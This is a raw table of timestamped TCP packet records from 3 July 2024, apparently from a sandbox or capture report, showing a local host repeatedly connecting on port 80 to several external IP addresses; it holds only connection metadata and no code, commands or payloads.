                                                          Jul 3, 2024 15:58:49.339951992 CEST4976780192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:50.357692957 CEST4976880192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:50.362668991 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.362746000 CEST4976880192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:50.365294933 CEST4976880192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:50.371290922 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.371315956 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.371337891 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.371355057 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.371397972 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.371445894 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.371454954 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.371464968 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.372704029 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:50.988629103 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:51.034667969 CEST4976880192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:51.080332041 CEST804976846.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:51.080401897 CEST4976880192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:51.869882107 CEST4976880192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:52.888230085 CEST4976980192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:52.893107891 CEST804976946.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:52.893203974 CEST4976980192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:52.894948006 CEST4976980192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:52.901456118 CEST804976946.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:53.517133951 CEST804976946.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:53.517312050 CEST804976946.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:53.520353079 CEST4976980192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:53.521209002 CEST4976980192.168.2.446.30.211.38
                                                          Jul 3, 2024 15:58:53.526032925 CEST804976946.30.211.38192.168.2.4
                                                          Jul 3, 2024 15:58:58.555401087 CEST4977080192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:58:58.560242891 CEST8049770217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:58:58.560317039 CEST4977080192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:58:58.567640066 CEST4977080192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:58:58.572494984 CEST8049770217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:58:59.248886108 CEST8049770217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:58:59.248914957 CEST8049770217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:58:59.249012947 CEST4977080192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:00.075984001 CEST4977080192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:01.092159033 CEST4977180192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:01.097117901 CEST8049771217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:01.097217083 CEST4977180192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:01.099225998 CEST4977180192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:01.106539011 CEST8049771217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:01.764475107 CEST8049771217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:01.764632940 CEST8049771217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:01.764746904 CEST4977180192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:02.604207993 CEST4977180192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:03.624092102 CEST4977280192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:03.629019022 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.629368067 CEST4977280192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:03.631957054 CEST4977280192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:03.636881113 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.636920929 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.636991024 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.637000084 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.637039900 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.637057066 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.637094021 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.637104034 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:03.637145042 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:04.285289049 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:04.285339117 CEST8049772217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:04.285388947 CEST4977280192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:05.135437012 CEST4977280192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:06.155958891 CEST4977380192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:06.160926104 CEST8049773217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:06.161014080 CEST4977380192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:06.163959026 CEST4977380192.168.2.4217.160.0.119
                                                          Jul 3, 2024 15:59:06.168766022 CEST8049773217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:06.803212881 CEST8049773217.160.0.119192.168.2.4
                                                          Jul 3, 2024 15:59:06.803824902 CEST8049773217.160.0.119192.168.2.4
Jul 3, 2024 15:59:06.803875923 CEST | 49773 | 80 | 192.168.2.4 | 217.160.0.119
Jul 3, 2024 15:59:06.806340933 CEST | 49773 | 80 | 192.168.2.4 | 217.160.0.119
Jul 3, 2024 15:59:06.811177969 CEST | 80 | 49773 | 217.160.0.119 | 192.168.2.4
Jul 3, 2024 15:59:11.879935980 CEST | 49774 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:11.884865046 CEST | 80 | 49774 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:11.885122061 CEST | 49774 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:11.888911009 CEST | 49774 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:11.893815041 CEST | 80 | 49774 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:12.362386942 CEST | 80 | 49774 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:12.362449884 CEST | 49774 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:13.401392937 CEST | 49774 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:13.406296015 CEST | 80 | 49774 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:14.549169064 CEST | 49775 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:14.554558039 CEST | 80 | 49775 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:14.554630995 CEST | 49775 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:14.556703091 CEST | 49775 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:14.563767910 CEST | 80 | 49775 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:15.017175913 CEST | 80 | 49775 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:15.017252922 CEST | 49775 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:16.073019028 CEST | 49775 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:16.077966928 CEST | 80 | 49775 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.130686045 CEST | 49776 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:17.135620117 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.135705948 CEST | 49776 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:17.155595064 CEST | 49776 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:17.160710096 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.160729885 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.160738945 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.160747051 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.160756111 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.160763979 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.160774946 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.160783052 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.160792112 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.610440016 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:17.610611916 CEST | 49776 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:18.666712046 CEST | 49776 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:18.671592951 CEST | 80 | 49776 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:19.693914890 CEST | 49777 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:19.699575901 CEST | 80 | 49777 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:19.699767113 CEST | 49777 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:19.703322887 CEST | 49777 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:19.708216906 CEST | 80 | 49777 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:20.161262035 CEST | 80 | 49777 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:20.161562920 CEST | 80 | 49777 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:20.161906004 CEST | 49777 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:20.165906906 CEST | 49777 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:20.172099113 CEST | 80 | 49777 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:25.498460054 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:25.503398895 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:25.505705118 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:25.505705118 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:25.510972023 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271322966 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271352053 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271365881 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271395922 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:26.271436930 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271450043 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271465063 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271478891 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271487951 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:26.271492004 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271512032 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:26.271536112 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:26.271711111 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271724939 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.271765947 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:26.276340961 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.276384115 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.276395082 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.276433945 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:26.322905064 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:26.358944893 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.358968019 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.358990908 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.359003067 CEST | 80 | 49778 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:26.359041929 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:26.359112978 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:27.013236046 CEST | 49778 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.028933048 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.033978939 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.034126043 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.035813093 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.040724993 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960494041 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960521936 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960534096 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960545063 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960566998 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.960583925 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960597992 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960598946 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.960660934 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.960720062 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960731983 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960743904 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960757017 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.960773945 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.960793018 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:28.965537071 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.965579987 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.965591908 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:28.965622902 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:29.008447886 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:29.066231966 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:29.066270113 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:29.066282988 CEST | 80 | 49779 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:29.066342115 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:29.541876078 CEST | 49779 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:30.583810091 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:30.588733912 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.588803053 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:30.591555119 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:30.596782923 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.596941948 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.596955061 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.597086906 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.597095966 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.597230911 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.597240925 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.597249985 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:30.597487926 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.300964117 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.300981045 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.300992966 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.301048994 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.301064968 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.301075935 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.301170111 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:31.301170111 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:31.301230907 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.301243067 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.301254034 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.301281929 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:31.301451921 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.305913925 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:31.306648016 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.306725025 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.306735039 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.309916973 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:31.391928911 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.392019987 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.392030954 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.392232895 CEST | 80 | 49780 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:31.392262936 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:31.392920017 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:32.104336977 CEST | 49780 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:33.122731924 CEST | 49781 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:33.127943039 CEST | 80 | 49781 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:33.128041029 CEST | 49781 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:33.129729033 CEST | 49781 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:33.134548903 CEST | 80 | 49781 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:33.824275970 CEST | 80 | 49781 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:33.869959116 CEST | 49781 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:38.830106974 CEST | 80 | 49781 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:38.830215931 CEST | 49781 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:38.831618071 CEST | 49781 | 80 | 192.168.2.4 | 162.241.2.92
Jul 3, 2024 15:59:38.837052107 CEST | 80 | 49781 | 162.241.2.92 | 192.168.2.4
Jul 3, 2024 15:59:44.351119041 CEST | 49782 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:44.356040001 CEST | 80 | 49782 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:44.356122017 CEST | 49782 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:44.358217001 CEST | 49782 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:44.363054991 CEST | 80 | 49782 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:44.940063000 CEST | 80 | 49782 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:44.940102100 CEST | 80 | 49782 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:44.940118074 CEST | 80 | 49782 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:44.940138102 CEST | 80 | 49782 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:44.940150023 CEST | 80 | 49782 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:44.940203905 CEST | 49782 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:44.944099903 CEST | 49782 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:45.873928070 CEST | 49782 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:46.888210058 CEST | 49783 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:46.893162012 CEST | 80 | 49783 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:46.893254995 CEST | 49783 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:46.894993067 CEST | 49783 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:46.899852037 CEST | 80 | 49783 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:47.478207111 CEST | 80 | 49783 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:47.478220940 CEST | 80 | 49783 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:47.478233099 CEST | 80 | 49783 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:47.478249073 CEST | 80 | 49783 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:47.478260040 CEST | 80 | 49783 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:47.478560925 CEST | 49783 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:48.401159048 CEST | 49783 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:49.421928883 CEST | 49784 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:49.426938057 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.430026054 CEST | 49784 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:49.432513952 CEST | 49784 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:49.437405109 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.437517881 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.437530041 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.437649012 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.437659025 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.437668085 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.437673092 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.437817097 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.437827110 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.996375084 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.996396065 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.996408939 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:49.996512890 CEST | 49784 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:50.002183914 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:50.002482891 CEST | 80 | 49784 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:50.002648115 CEST | 49784 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:50.947989941 CEST | 49784 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:51.969304085 CEST | 49785 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:51.974529028 CEST | 80 | 49785 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:51.978007078 CEST | 49785 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:51.980530024 CEST | 49785 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:51.985601902 CEST | 80 | 49785 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:52.541429043 CEST | 80 | 49785 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:52.541451931 CEST | 80 | 49785 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:52.541465998 CEST | 80 | 49785 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:52.541476011 CEST | 80 | 49785 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:52.541570902 CEST | 49785 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:52.541619062 CEST | 49785 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:52.541846037 CEST | 80 | 49785 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:52.541896105 CEST | 49785 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:52.549396038 CEST | 49785 | 80 | 192.168.2.4 | 162.240.81.18
Jul 3, 2024 15:59:52.554322958 CEST | 80 | 49785 | 162.240.81.18 | 192.168.2.4
Jul 3, 2024 15:59:57.705101967 CEST | 49786 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:57.710308075 CEST | 80 | 49786 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:57.710429907 CEST | 49786 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:57.713947058 CEST | 49786 | 80 | 192.168.2.4 | 3.33.130.190
Jul 3, 2024 15:59:57.718827963 CEST | 80 | 49786 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:58.195744991 CEST | 80 | 49786 | 3.33.130.190 | 192.168.2.4
Jul 3, 2024 15:59:58.196113110 CEST | 49786 | 80 | 192.168.2.4 | 3.33.130.190
